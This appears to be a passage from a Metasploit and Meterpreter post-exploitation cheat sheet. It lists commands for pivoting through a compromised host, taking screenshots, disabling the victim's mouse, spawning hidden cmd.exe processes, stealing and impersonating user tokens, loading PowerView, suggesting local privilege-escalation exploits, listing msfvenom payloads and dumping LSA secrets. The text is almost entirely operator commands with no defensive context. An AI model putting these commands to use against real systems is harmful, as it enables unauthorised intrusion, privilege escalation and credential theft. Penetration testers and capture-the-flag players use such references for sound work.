Port Forwarding
portfwd add -l 1111 -p 22 -r Target2
Screenshot
screenshot -p file.jpg
Idle Time
idletime
Disable/Enable Mouse
uictl
Execute a command (interact with process / create a hidden process)
execute -f cmd.exe -i -H
Execute a command with arguments
execute -f cmd.exe -H -a "/c net users"
Steal a token from PID
steal_token PID
Impersonate a User Token
Spawn Process as Impersonated User
execute -f cmd.exe -i -H -t
PowerShell Execute (load powershell)
powershell_execute "Get-ChildItem C:\Users\user -Recurse"
PowerShell Import
powershell_import /path/to/powerview.ps1
Immediately Background Sessions
exploit -j
Set global variable
setg RHOSTS 1.2.3.4
Local Exploit Suggester
meterpreter> run post/multi/recon/local_exploit_suggester
List Payloads
msfvenom --list payloads
Payload Types
asp, perl, jsp, python, jar, php, linux (elf), windows (exe, dll, ps1, psh-cmd)
windows/gather/lsa_secrets
Dumps LSA Secrets. You can also use Kiwi's lsa_dump_secrets (probably better).